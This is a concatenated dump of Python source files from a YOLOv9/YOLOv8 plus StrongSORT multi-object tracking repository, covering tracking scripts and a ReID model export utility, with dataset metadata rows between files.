sys.path.append(str(ROOT / 'strong_sort')) # add strong_sort ROOT to PATH
ROOT = Path(os.path.relpath(ROOT, Path.cwd())) # relative
from yolov9.models.experimental import attempt_load
from yolov9.models.common import DetectMultiBackend
from yolov9.utils.dataloaders import LoadImages, LoadStreams, LoadScreenshots
from yolov9.utils.general import (LOGGER, Profile, check_file, check_img_size, check_imshow, check_requirements, colorstr, cv2,
increment_path, non_max_suppression, print_args, scale_boxes, strip_optimizer, xyxy2xywh)
from yolov9.utils.torch_utils import select_device, time_sync, smart_inference_mode
from yolov9.utils.plots import Annotator, colors, save_one_box
from strong_sort.utils.parser import get_config
from strong_sort.strong_sort import StrongSORT
VID_FORMATS = 'asf', 'avi', 'gif', 'm4v', 'mkv', 'mov', 'mp4', 'mpeg', 'mpg', 'ts', 'wmv' # include video suffixes
def plot_one_box(x, img, color=None, label=None, line_thickness=3):
# Plots one bounding box on image img
tl = line_thickness or round(0.002 * (img.shape[0] + img.shape[1]) / 2) + 1 # line/font thickness
color = color or [random.randint(0, 255) for _ in range(3)]
c1, c2 = (int(x[0]), int(x[1])), (int(x[2]), int(x[3]))
cv2.rectangle(img, c1, c2, color, thickness=tl, lineType=cv2.LINE_AA)
if label:
tf = max(tl - 1, 1) # font thickness
t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3
cv2.rectangle(img, c1, c2, color, -1, cv2.LINE_AA) # filled
cv2.putText(img, label, (c1[0], c1[1] - 2), 0, tl / 3, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)
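# Illustrative use (hypothetical frame and values):
#   frame = cv2.imread('frame.jpg')
#   plot_one_box([50, 60, 200, 220], frame, color=(0, 0, 255), label='3 person 0.91', line_thickness=2)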
@smart_inference_mode()
def run(
source='0',
data = ROOT / 'data/coco.yaml', # data.yaml path
yolo_weights=WEIGHTS / 'yolo.pt', # model.pt path(s),
strong_sort_weights=WEIGHTS / 'osnet_x0_25_msmt17.pt', # model.pt path,
config_strongsort=ROOT / 'strong_sort/configs/strong_sort.yaml',
imgsz=(640, 640), # inference size (height, width)
conf_thres=0.25, # confidence threshold
iou_thres=0.45, # NMS IOU threshold
max_det=1000, # maximum detections per image
device='', # cuda device, i.e. 0 or 0,1,2,3 or cpu
view_img=False, # show results
save_txt=False, # save results to *.txt
save_conf=False, # save confidences in --save-txt labels
save_crop=False, # save cropped prediction boxes
nosave=False, # do not save images/videos
classes=None, # filter by class: --class 0, or --class 0 2 3
agnostic_nms=False, # class-agnostic NMS
augment=False, # augmented inference
visualize=False, # visualize features
update=False, # update all models
project=ROOT / 'runs/track', # save results to project/name
name='exp', # save results to project/name
exist_ok=False, # existing project/name ok, do not increment
line_thickness=3, # bounding box thickness (pixels)
hide_labels=False, # hide labels
hide_conf=False, # hide confidences
half=False, # use FP16 half-precision inference
dnn=False, # use OpenCV DNN for ONNX inference
vid_stride=1, # video frame-rate stride
):
source = str(source)
save_img = not nosave and not source.endswith('.txt') # save inference images
is_file = Path(source).suffix[1:] in (VID_FORMATS)
is_url = source.lower().startswith(('rtsp://', 'rtmp://', 'http://', 'https://'))
webcam = source.isnumeric() or source.endswith('.txt') or (is_url and not is_file)
screenshot = source.lower().startswith('screen')
if is_url and is_file:
source = check_file(source) # download
# Directories
if not isinstance(yolo_weights, list): # single yolo model
exp_name = yolo_weights.stem
elif type(yolo_weights) is list and len(yolo_weights) == 1: # single models after --yolo_weights
exp_name = Path(yolo_weights[0]).stem
yolo_weights = Path(yolo_weights[0])
else: # multiple models after --yolo_weights
exp_name = 'ensemble'
exp_name = name if name else exp_name + "_" + strong_sort_weights.stem
save_dir = increment_path(Path(project) / exp_name, exist_ok=exist_ok) # increment run
save_dir = Path(save_dir)
(save_dir / 'tracks' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
device = select_device(device)
model = DetectMultiBackend(yolo_weights, device=device, dnn=dnn, data=data, fp16=half)
stride, names, pt = model.stride, model.names, model.pt
imgsz = check_img_size(imgsz, s=stride) # check image size
    # Dataloader
bs = 1 # batch_size
if webcam:
view_img = check_imshow(warn=True)
dataset = LoadStreams(source, img_size=imgsz, stride=stride, auto=pt, vid_stride=vid_stride)
bs = len(dataset)
elif screenshot:
dataset = LoadScreenshots(source, img_size=imgsz, stride=stride, auto=pt)
else:
dataset = LoadImages(source, img_size=imgsz, stride=stride, auto=pt, vid_stride=vid_stride)
vid_path, vid_writer,txt_path = [None] * bs, [None] * bs, [None] * bs
# initialize StrongSORT
cfg = get_config()
    cfg.merge_from_file(config_strongsort)
# Create as many strong sort instances as there are video sources
strongsort_list = []
for i in range(bs):
strongsort_list.append(
StrongSORT(
strong_sort_weights,
device,
half,
max_dist=cfg.STRONGSORT.MAX_DIST,
max_iou_distance=cfg.STRONGSORT.MAX_IOU_DISTANCE,
max_age=cfg.STRONGSORT.MAX_AGE,
n_init=cfg.STRONGSORT.N_INIT,
nn_budget=cfg.STRONGSORT.NN_BUDGET,
mc_lambda=cfg.STRONGSORT.MC_LAMBDA,
ema_alpha=cfg.STRONGSORT.EMA_ALPHA,
)
)
strongsort_list[i].model.warmup()
outputs = [None] * bs
colors = [[random.randint(0, 255) for _ in range(3)] for _ in names]
# Run tracking
model.warmup(imgsz=(1 if pt or model.triton else bs, 3, *imgsz)) # warmup
seen, windows, dt,sdt = 0, [], (Profile(), Profile(), Profile(), Profile()),[0.0, 0.0, 0.0, 0.0]
curr_frames, prev_frames = [None] * bs, [None] * bs
for frame_idx, (path, im, im0s, vid_cap, s) in enumerate(dataset):
# s = ''
t1 = time_sync()
with dt[0]:
im = torch.from_numpy(im).to(model.device)
im = im.half() if model.fp16 else im.float() # uint8 to fp16/32
im /= 255 # 0 - 255 to 0.0 - 1.0
if len(im.shape) == 3:
im = im[None] # expand for batch dim
t2 = time_sync()
sdt[0] += t2 - t1
# Inference
with dt[1]:
visualize = increment_path(save_dir / Path(path).stem, mkdir=True) if visualize else False
pred = model(im, augment=augment, visualize=visualize)
pred = pred[0]
t3 = time_sync()
sdt[1] += t3 - t2
# Apply NMS
with dt[2]:
pred = non_max_suppression(pred, conf_thres, iou_thres, classes, agnostic_nms, max_det=max_det)
sdt[2] += time_sync() - t3
# Second-stage classifier (optional)
# pred = utils.general.apply_classifier(pred, classifier_model, im, im0s)
# Process detections
for i, det in enumerate(pred): # detections per image
seen += 1
if webcam: # bs >= 1
p, im0, _ = path[i], im0s[i].copy(), dataset.count
p = Path(p) # to Path
s += f'{i}: '
# txt_file_name = p.name
txt_file_name = p.stem + f'_{i}' # Unique text file name
# save_path = str(save_dir / p.name) + str(i) # im.jpg, vid.mp4, ...
save_path = str(save_dir / p.stem) + f'_{i}' # Unique video file name
else:
p, im0, _ = path, im0s.copy(), getattr(dataset, 'frame', 0)
p = Path(p) # to Path
# video file
if source.endswith(VID_FORMATS):
txt_file_name = p.stem
save_path = str(save_dir / p.name) # im.jpg, vid.mp4, ...
# folder with imgs
else:
txt_file_name = p.parent.name # get folder name containing current img
save_path = str(save_dir / p.parent.name) # im.jpg, vid.mp4, ...
curr_frames[i] = im0
txt_path = str(save_dir / 'tracks' / txt_file_name) # im.txt
s += '%gx%g ' % im.shape[2:] # print string
gn = torch.tensor(im0.shape)[[1, 0, 1, 0]] # normalization gain whwh
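            # gn holds [w, h, w, h] of the original frame (e.g. [1280, 720, 1280, 720] for a 720p video),
            # so dividing an xywh box by it yields the normalized coordinates written to the txt file.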
imc = im0.copy() if save_crop else im0 # for save_crop
annotator = Annotator(im0, line_width=line_thickness, example=str(names))
if cfg.STRONGSORT.ECC: # camera motion compensation
strongsort_list[i].tracker.camera_update(prev_frames[i], curr_frames[i])
if det is not None and len(det):
# Rescale boxes from img_size to im0 size
det[:, :4] = scale_boxes(im.shape[2:], det[:, :4], im0.shape).round()
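                # Detections are produced in the letterboxed `im` space; scale_boxes maps them back to the
                # original `im0` resolution before they are converted to xywh and handed to StrongSORT.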
# Print results
for c in det[:, -1].unique():
n = (det[:, -1] == c).sum() # detections per class
s += f"{n} {names[int(c)]}{'s' * (n > 1)}, " # add to string
xywhs = xyxy2xywh(det[:, 0:4])
confs = det[:, 4]
clss = det[:, 5]
# pass detections to strongsort
t4 = time_sync()
outputs[i] = strongsort_list[i].update(xywhs.cpu(), confs.cpu(), clss.cpu(), im0)
t5 = time_sync()
sdt[3] += t5 - t4
# Write results
for j, (output, conf) in enumerate(zip(outputs[i], confs)):
xyxy = output[0:4]
id = output[4]
cls = output[5]
# for *xyxy, conf, cls in reversed(det):
if save_txt: # Write to file
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
# line = (id , cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
                        line = (int(p.stem), frame_idx, id, cls, *xywh, conf) if save_conf else (int(p.stem), frame_idx, cls, *xywh)  # label format
with open(txt_path + '.txt', 'a') as file:
file.write(('%g ' * len(line) + '\n') % line)
if save_img or save_crop or view_img: # Add bbox to image
c = int(cls) # integer class
                        label = None if hide_labels else (names[c] if hide_conf else f'{int(id)} {names[c]} {conf:.2f}')
plot_one_box(xyxy, im0, label=label, color=colors[int(cls)], line_thickness=2)
if save_crop:
save_one_box(xyxy, imc, file=save_dir / 'crops' / names[c] / f'{p.stem}.jpg', BGR=True)
# # draw boxes for visualization
# if len(outputs[i]) > 0:
# for j, (output, conf) in enumerate(zip(outputs[i], confs)):
# bboxes = output[0:4]
# id = output[4]
# cls = output[5]
# if save_txt:
# # to MOT format
# bbox_left = output[0]
# bbox_top = output[1]
# bbox_w = output[2] - output[0]
# bbox_h = output[3] - output[1]
# # format video_name frame id xmin ymin width height score class
# with open(txt_path + '.txt', 'a') as file:
# file.write(f'{p.stem} {frame_idx} {id} {bbox_left} {bbox_top} {bbox_w} {bbox_h} {conf:.2f} {cls}\n')
# if save_img or save_crop or view_img: # Add bbox to image
# c = int(cls) # integer class
# id = int(id) # integer id
# label = None if hide_labels else (names[c] if hide_conf else f'{names[c]} {conf:.2f}')
# plot_one_box(bboxes, im0, label=label, color=colors[int(cls)], line_thickness=2)
# if save_crop:
# txt_file_name = txt_file_name if (isinstance(path, list) and len(path) > 1) else ''
# save_one_box(bboxes, imc, file=save_dir / 'crops' / txt_file_name / names[c] / f'{id}' / f'{p.stem}.jpg', BGR=True)
print(f'{s}Done. YOLO:({t3 - t2:.3f}s), StrongSORT:({t5 - t4:.3f}s)')
else:
strongsort_list[i].increment_ages()
print('No detections')
# Stream results
im0 = annotator.result()
if view_img:
if platform.system() == 'Linux' and p not in windows:
windows.append(p)
cv2.namedWindow(str(p), cv2.WINDOW_NORMAL | cv2.WINDOW_KEEPRATIO) # allow window resize (Linux)
cv2.resizeWindow(str(p), im0.shape[1], im0.shape[0])
cv2.imshow(str(p), im0)
cv2.waitKey(1) # 1 millisecond
# Save results (image with detections)
if save_img:
if dataset.mode == 'image':
cv2.imwrite(save_path, im0)
else: # 'video' or 'stream'
if vid_path[i] != save_path: # new video
vid_path[i] = save_path
if isinstance(vid_writer[i], cv2.VideoWriter):
vid_writer[i].release() # release previous video writer
if vid_cap: # video
fps = vid_cap.get(cv2.CAP_PROP_FPS)
w = int(vid_cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(vid_cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
else: # stream
fps, w, h = 30, im0.shape[1], im0.shape[0]
save_path = str(Path(save_path).with_suffix('.mp4')) # force *.mp4 suffix on results videos
vid_writer[i] = cv2.VideoWriter(save_path, cv2.VideoWriter_fourcc(*'mp4v'), fps, (w, h))
vid_writer[i].write(im0)
prev_frames[i] = curr_frames[i]
# Print time (inference-only)
LOGGER.info(f"{s}{'' if len(det) else '(no detections), '}{dt[1].dt * 1E3:.1f}ms")
# Print results
    LOGGER.info('Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS, %.1fms StrongSORT update per image' % tuple(1E3 * x / seen for x in sdt))
if save_txt or save_img:
        s = f"\n{len(list(save_dir.glob('tracks/*.txt')))} tracks saved to {save_dir / 'tracks'}" if save_txt else ''
LOGGER.info(f"Results saved to {colorstr('bold', save_dir)}{s}")
if update:
strip_optimizer(yolo_weights[0]) # update model (to fix SourceChangeWarning)
def parse_opt():
parser = argparse.ArgumentParser()
parser.add_argument('--yolo-weights', nargs='+', type=str, default=WEIGHTS / 'yolov9.pt', help='model.pt path(s)')
parser.add_argument('--strong-sort-weights', type=str, default=WEIGHTS / 'osnet_x0_25_msmt17.pt')
parser.add_argument('--config-strongsort', type=str, default='strong_sort/configs/strong_sort.yaml')
parser.add_argument('--source', type=str, default='0', help='file/dir/URL/glob, 0 for webcam')
parser.add_argument('--data', type=str, default=ROOT / 'data/coco128.yaml', help='(optional) dataset.yaml path')
parser.add_argument('--imgsz', '--img', '--img-size', nargs='+', type=int, default=[640], help='inference size h,w')
parser.add_argument('--conf-thres', type=float, default=0.5, help='confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.5, help='NMS IoU threshold')
parser.add_argument('--max-det', type=int, default=1000, help='maximum detections per image')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--view-img', action='store_true', help='show results')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-crop', action='store_true', help='save cropped prediction boxes')
parser.add_argument('--nosave', action='store_true', help='do not save images/videos')
    # class 0 is person, 1 is bicycle, 2 is car... 79 is oven
parser.add_argument('--classes', nargs='+', type=int, help='filter by class: --classes 0, or --classes 0 2 3')
parser.add_argument('--agnostic-nms', action='store_true', help='class-agnostic NMS')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--visualize', action='store_true', help='visualize features')
parser.add_argument('--update', action='store_true', help='update all models')
parser.add_argument('--project', default=ROOT / 'runs/track', help='save results to project/name')
parser.add_argument('--name', default='exp', help='save results to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--line-thickness', default=3, type=int, help='bounding box thickness (pixels)')
parser.add_argument('--hide-labels', default=False, action='store_true', help='hide labels')
parser.add_argument('--hide-conf', default=False, action='store_true', help='hide confidences')
parser.add_argument('--half', action='store_true', help='use FP16 half-precision inference')
parser.add_argument('--vid-stride', type=int, default=1, help='video frame-rate stride')
parser.add_argument('--dnn', action='store_true', help='use OpenCV DNN for ONNX inference')
opt = parser.parse_args()
opt.imgsz *= 2 if len(opt.imgsz) == 1 else 1 # expand
return opt
def main(opt):
# check_requirements(requirements=ROOT / 'requirements.txt', exclude=('tensorboard', 'thop'))
run(**vars(opt))
if __name__ == "__main__":
opt = parse_opt()
main(opt)
| 19,587 | Python | .py | 336 | 47.229167 | 150 | 0.577998 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,107 | reid_export.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/reid_export.py | import torch
import argparse
import sys
import os
from pathlib import Path
import subprocess
FILE = Path(__file__).resolve()
ROOT = FILE.parents[0].parents[0] # yolov5 strongsort root directory
WEIGHTS = ROOT / 'weights'
if str(ROOT) not in sys.path:
sys.path.append(str(ROOT)) # add ROOT to PATH
if str(ROOT / 'yolov5') not in sys.path:
sys.path.append(str(ROOT / 'yolov5/')) # add yolov5 ROOT to PATH
if str(ROOT / 'strong_sort') not in sys.path:
sys.path.append(str(ROOT / 'strong_sort/')) # add strong_sort ROOT to PATH
ROOT = Path(os.path.relpath(ROOT, Path.cwd())) # relative
from yolov7.utils.general import colorstr
from yolov7.utils.add_nms import LOGGER
from strong_sort.deep.reid.torchreid.utils.feature_extractor import FeatureExtractor
from strong_sort.deep.reid.torchreid.models import build_model
from strong_sort.deep.reid_model_factory import get_model_name
def file_size(path):
# Return file/dir size (MB)
path = Path(path)
if path.is_file():
return path.stat().st_size / 1E6
elif path.is_dir():
return sum(f.stat().st_size for f in path.glob('**/*') if f.is_file()) / 1E6
else:
return 0.0
def export_onnx(model, im, file, opset, train=False, dynamic=True, simplify=False):
# ONNX export
try:
import onnx
f = file.with_suffix('.onnx')
LOGGER.info(f'\nstarting export with onnx {onnx.__version__}...')
torch.onnx.export(
model.cpu() if dynamic else model, # --dynamic only compatible with cpu
im.cpu() if dynamic else im,
f,
verbose=False,
opset_version=opset,
training=torch.onnx.TrainingMode.TRAINING if train else torch.onnx.TrainingMode.EVAL,
do_constant_folding=not train,
input_names=['images'],
output_names=['output'],
dynamic_axes={
'images': {
0: 'batch',
}, # shape(x,3,256,128)
'output': {
0: 'batch',
} # shape(x,2048)
} if dynamic else None
)
# Checks
model_onnx = onnx.load(f) # load onnx model
onnx.checker.check_model(model_onnx) # check onnx model
onnx.save(model_onnx, f)
# Simplify
if simplify:
try:
import onnxsim
LOGGER.info(f'simplifying with onnx-simplifier {onnxsim.__version__}...')
model_onnx, check = onnxsim.simplify(
model_onnx,
dynamic_input_shape=dynamic,
input_shapes={'t0': list(im.shape)} if dynamic else None)
assert check, 'assert check failed'
onnx.save(model_onnx, f)
except Exception as e:
LOGGER.info(f'simplifier failure: {e}')
LOGGER.info(f'export success, saved as {f} ({file_size(f):.1f} MB)')
LOGGER.info(f"run --dynamic ONNX model inference with: 'python detect.py --weights {f}'")
except Exception as e:
LOGGER.info(f'export failure: {e}')
return f
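# Illustrative use (hypothetical paths), mirroring the __main__ block below: export the ReID backbone
# to ONNX with a dynamic batch axis:
#   f = export_onnx(extractor.model.eval(), torch.zeros(1, 3, 256, 128), Path('weights/osnet_x0_25_msmt17.pt'),
#                   opset=12, train=False, dynamic=True, simplify=True)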
def export_openvino(file, dynamic, half, prefix=colorstr('OpenVINO:')):
f = str(file).replace('.onnx', f'_openvino_model{os.sep}')
# YOLOv5 OpenVINO export
try:
#check_requirements(('openvino-dev',)) # requires openvino-dev: https://pypi.org/project/openvino-dev/
import openvino.inference_engine as ie
LOGGER.info(f'\n{prefix} starting export with openvino {ie.__version__}...')
f = str(file).replace('.onnx', f'_openvino_model{os.sep}')
dyn_shape = [-1,3,256,128] if dynamic else None
cmd = f"mo \
--input_model {file} \
--output_dir {f} \
--data_type {'FP16' if half else 'FP32'}"
if dyn_shape is not None:
            cmd += f" --input_shape {dyn_shape}"
subprocess.check_output(cmd.split()) # export
LOGGER.info(f'{prefix} export success, saved as {f} ({file_size(f):.1f} MB)')
return f
except Exception as e:
LOGGER.info(f'\n{prefix} export failure: {e}')
return f
def export_tflite(file, half, prefix=colorstr('TFLite:')):
# YOLOv5 OpenVINO export
try:
#check_requirements(('openvino-dev',)) # requires openvino-dev: https://pypi.org/project/openvino-dev/
import openvino.inference_engine as ie
LOGGER.info(f'\n{prefix} starting export with openvino {ie.__version__}...')
output = Path(str(file).replace(f'_openvino_model{os.sep}', f'_tflite_model{os.sep}'))
f = (Path(str(file).replace(f'_openvino_model{os.sep}', f'_tflite_model{os.sep}')).parent).joinpath(list(Path(file).glob('*.xml'))[0])
cmd = f"openvino2tensorflow \
--model_path {f} \
--model_output_path {output} \
--output_pb \
--output_saved_model \
--output_no_quant_float32_tflite \
--output_dynamic_range_quant_tflite"
subprocess.check_output(cmd.split()) # export
LOGGER.info(f'{prefix} export success, results saved in {output} ({file_size(f):.1f} MB)')
return f
except Exception as e:
LOGGER.info(f'\n{prefix} export failure: {e}')
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="CPHD train")
parser.add_argument(
"-d",
"--dynamic",
action="store_true",
help="dynamic model input",
)
parser.add_argument(
"-p",
"--weights",
type=Path,
default="/home/mikel.brostrom/Yolov5_StrongSORT_OSNet/osnet_x0_25_msmt17.pt",
help="Path to weights",
)
parser.add_argument(
"-hp",
"--half_precision",
action="store_true",
help="transform model to half precision",
)
parser.add_argument(
'--imgsz', '--img', '--img-size',
nargs='+',
type=int,
default=[256, 128],
help='image (h, w)'
)
args = parser.parse_args()
# Build model
extractor = FeatureExtractor(
# get rid of dataset information DeepSort model name
model_name=get_model_name(args.weights),
model_path=args.weights,
device=str('cpu')
)
im = torch.zeros(1, 3, args.imgsz[0], args.imgsz[1]).to('cpu') # image size(1,3,640,480) BCHW iDetection
f = export_onnx(extractor.model.eval(), im, args.weights, 12, train=False, dynamic=args.dynamic, simplify=True) # opset 12
f = export_openvino(f, dynamic=args.dynamic, half=False)
export_tflite(f, False)
| 6,643 | Python | .py | 158 | 33.202532 | 142 | 0.60234 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,108 | trackv8.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/trackv8.py | import argparse
import os
# limit the number of cpus used by high performance libraries
os.environ["OMP_NUM_THREADS"] = "1"
os.environ["OPENBLAS_NUM_THREADS"] = "1"
os.environ["MKL_NUM_THREADS"] = "1"
os.environ["VECLIB_MAXIMUM_THREADS"] = "1"
os.environ["NUMEXPR_NUM_THREADS"] = "1"
import glob
import platform
import re
import subprocess
import sys
from pathlib import Path
from time import time
import cv2
import numpy as np
import pandas as pd
import torch
import torch.backends.cudnn as cudnn
from numpy import random
from ultralytics import YOLO
FILE = Path(__file__).resolve()
ROOT = FILE.parents[0] # yolov5 strongsort root directory
WEIGHTS = ROOT / 'weights'
if str(ROOT) not in sys.path:
sys.path.append(str(ROOT)) # add ROOT to PATH
if str(ROOT / 'yolov7') not in sys.path:
sys.path.append(str(ROOT / 'yolov7')) # add yolov5 ROOT to PATH
if str(ROOT / 'strong_sort') not in sys.path:
sys.path.append(str(ROOT / 'strong_sort')) # add strong_sort ROOT to PATH
ROOT = Path(os.path.relpath(ROOT, Path.cwd())) # relative
from ultralytics.utils.torch_utils import select_device, time_sync
from datasets import LoadImages, LoadStreams
from ultralytics.utils import colorstr
from ultralytics.utils.checks import check_file, check_requirements, check_imshow
from ultralytics.utils.ops import non_max_suppression, scale_coords
from ultralytics.utils.plotting import save_one_box
import cv2
from strong_sort.utils.parser import get_config
from strong_sort.strong_sort import StrongSORT
VID_FORMATS = 'asf', 'avi', 'gif', 'm4v', 'mkv', 'mov', 'mp4', 'mpeg', 'mpg', 'ts', 'wmv' # include video suffixes
def strip_optimizer(f='best.pt', s=''): # from utils.general import *; strip_optimizer()
# Strip optimizer from 'f' to finalize training, optionally save as 's'
x = torch.load(f, map_location=torch.device('cpu'))
if x.get('ema'):
x['model'] = x['ema'] # replace model with ema
for k in 'optimizer', 'training_results', 'wandb_id', 'ema', 'updates': # keys
x[k] = None
x['epoch'] = -1
x['model'].half() # to FP16
for p in x['model'].parameters():
p.requires_grad = False
torch.save(x, s or f)
mb = os.path.getsize(s or f) / 1E6 # filesize
print(f"Optimizer stripped from {f},{(' saved as %s,' % s) if s else ''} {mb:.1f}MB")
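# Illustrative use (hypothetical path): strip_optimizer('runs/train/exp/weights/best.pt') rewrites the
# checkpoint in place as a smaller FP16, inference-only copy (optimizer/EMA state removed).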
def increment_path(path, exist_ok=True, sep=''):
# Increment path, i.e. runs/exp --> runs/exp{sep}0, runs/exp{sep}1 etc.
path = Path(path) # os-agnostic
if (path.exists() and exist_ok) or (not path.exists()):
return str(path)
else:
dirs = glob.glob(f"{path}{sep}*") # similar paths
matches = [re.search(rf"%s{sep}(\d+)" % path.stem, d) for d in dirs]
i = [int(m.groups()[0]) for m in matches if m] # indices
n = max(i) + 1 if i else 2 # increment number
return f"{path}{sep}{n}" # update path
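# e.g. with exist_ok=False an existing 'runs/track/exp' yields 'runs/track/exp2', then 'runs/track/exp3', ...;
# with exist_ok=True (the default) an existing path is returned unchanged.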
def isdocker():
# Is environment a Docker container
return Path('/workspace').exists() # or Path('/.dockerenv').exists()
def emojis(str=''):
# Return platform-dependent emoji-safe version of string
return str.encode().decode('ascii', 'ignore') if platform.system() == 'Windows' else str
def plot_one_box(x, img, color=None, label=None, line_thickness=3):
# Plots one bounding box on image img
tl = line_thickness or round(0.002 * (img.shape[0] + img.shape[1]) / 2) + 1 # line/font thickness
color = color or [random.randint(0, 255) for _ in range(3)]
c1, c2 = (int(x[0]), int(x[1])), (int(x[2]), int(x[3]))
cv2.rectangle(img, c1, c2, color, thickness=tl, lineType=cv2.LINE_AA)
if label:
tf = max(tl - 1, 1) # font thickness
t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3
cv2.rectangle(img, c1, c2, color, -1, cv2.LINE_AA) # filled
cv2.putText(img, label, (c1[0], c1[1] - 2), 0, tl / 3, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)
@torch.no_grad()
def run(
source= '0',
yolo_weights=WEIGHTS / 'yolov8.pt', # model.pt path(s),
strong_sort_weights=WEIGHTS / 'osnet_x0_25_msmt17.pt', # model.pt path,
config_strongsort=ROOT / 'strong_sort/configs/strong_sort.yaml',
imgsz=(640, 640), # inference size (height, width)
conf_thres=0.25, # confidence threshold
iou_thres=0.45, # NMS IOU threshold
max_det=1000, # maximum detections per image
device='', # cuda device, i.e. 0 or 0,1,2,3 or cpu
show_vid=False, # show results
save_txt=False, # save results to *.txt
save_conf=False, # save confidences in --save-txt labels
save_crop=False, # save cropped prediction boxes
save_vid=False, # save confidences in --save-txt labels
nosave=False, # do not save images/videos
classes=None, # filter by class: --class 0, or --class 0 2 3
agnostic_nms=False, # class-agnostic NMS
augment=False, # augmented inference
visualize=False, # visualize features
update=False, # update all models
project=ROOT / 'runs/track', # save results to project/name
name='exp', # save results to project/name
exist_ok=False, # existing project/name ok, do not increment
line_thickness=3, # bounding box thickness (pixels)
hide_labels=False, # hide labels
hide_conf=False, # hide confidences
hide_class=False, # hide IDs
half=False, # use FP16 half-precision inference
dnn=False, # use OpenCV DNN for ONNX inference
):
source = str(source)
save_img = not nosave and not source.endswith('.txt') # save inference images
is_file = Path(source).suffix[1:] in (VID_FORMATS)
is_url = source.lower().startswith(('rtsp://', 'rtmp://', 'http://', 'https://'))
webcam = source.isnumeric() or source.endswith('.txt') or (is_url and not is_file)
if is_url and is_file:
source = check_file(source) # download
# # Directories
if not isinstance(yolo_weights, list): # single yolo model
exp_name = yolo_weights.stem
elif type(yolo_weights) is list and len(yolo_weights) == 1: # single models after --yolo_weights
exp_name = Path(yolo_weights[0]).stem
yolo_weights = Path(yolo_weights[0])
else: # multiple models after --yolo_weights
exp_name = 'ensemble'
exp_name = name if name else exp_name + "_" + strong_sort_weights.stem
save_dir = increment_path(Path(project) / exp_name, exist_ok=exist_ok) # increment run
save_dir = Path(save_dir)
(save_dir / 'tracks' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# # Load model
device = select_device(device)
# WEIGHTS.mkdir(parents=True, exist_ok=True)
model = YOLO(yolo_weights).to(device) # load yolo
    names = model.names
# stride = model.stride.max().cpu().numpy() # model stride
# imgsz = check_img_size(imgsz[0], s=stride) # check image size
# Dataloader
if webcam:
show_vid = check_imshow()
cudnn.benchmark = True # set True to speed up constant image size inference
dataset = LoadStreams(source, img_size=imgsz)
nr_sources = len(dataset.sources)
else:
dataset = LoadImages(source)
nr_sources = 1
vid_path, vid_writer, txt_path = [None] * nr_sources, [None] * nr_sources, [None] * nr_sources
# initialize StrongSORT
cfg = get_config()
    cfg.merge_from_file(config_strongsort)
# Create as many strong sort instances as there are video sources
strongsort_list = []
for i in range(nr_sources):
strongsort_list.append(
StrongSORT(
strong_sort_weights,
device,
half,
max_dist=cfg.STRONGSORT.MAX_DIST,
max_iou_distance=cfg.STRONGSORT.MAX_IOU_DISTANCE,
max_age=cfg.STRONGSORT.MAX_AGE,
n_init=cfg.STRONGSORT.N_INIT,
nn_budget=cfg.STRONGSORT.NN_BUDGET,
mc_lambda=cfg.STRONGSORT.MC_LAMBDA,
ema_alpha=cfg.STRONGSORT.EMA_ALPHA,
)
)
strongsort_list[i].model.warmup()
outputs = [None] * nr_sources
colors = [[random.randint(0, 255) for _ in range(3)] for _ in names]
# Run tracking
dt, seen = [0.0, 0.0, 0.0, 0.0], 0
curr_frames, prev_frames = [None] * nr_sources, [None] * nr_sources
# Initialize variables for FPS calculation
start_time = time()
frames_processed = 0
for frame_idx, (path, im, im0s, vid_cap) in enumerate(dataset):
if time() - start_time >= 1:
fps = frames_processed / (time() - start_time)
print(f'FPS: {fps:.2f}')
# Draw FPS on the frame
cv2.putText(im0, f'FPS: {fps:.2f}', (10, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)
# Reset variables for the next FPS calculation interval
start_time = time()
frames_processed = 0
# Increment the number of frames processed
frames_processed += 1
s = ''
t1 = time_sync()
im = torch.from_numpy(im).to(device)
im = im.half() if half else im.float() # uint8 to fp16/32
im /= 255.0 # 0 - 255 to 0.0 - 1.0
if len(im.shape) == 3:
im = im[None] # expand for batch dim
t2 = time_sync()
dt[0] += t2 - t1
# Inference
visualize = increment_path(save_dir / Path(path[0]).stem, mkdir=True) if visualize else False
pred = model.predict(im, augment=augment, conf=conf_thres, iou=iou_thres,save_crop=save_crop,name=name, project=project,exist_ok=True)
t3 = time_sync()
dt[1] += t3 - t2
# Apply NMS
# pred = non_max_suppression(pred[0], conf_thres, iou_thres, classes, agnostic_nms)
dt[2] += time_sync() - t3
# Process detections
for i, det in enumerate(pred): # detections per image
# txt_file_name = p.stem if not webcam else p.stem + f'_{i}' # Differentiate text file names for multiple videos
# save_path = str(save_dir / p.stem) if not webcam else str(save_dir / p.stem) + f'_{i}' # Differentiate video save paths for multiple videos
seen += 1
if webcam: # nr_sources >= 1
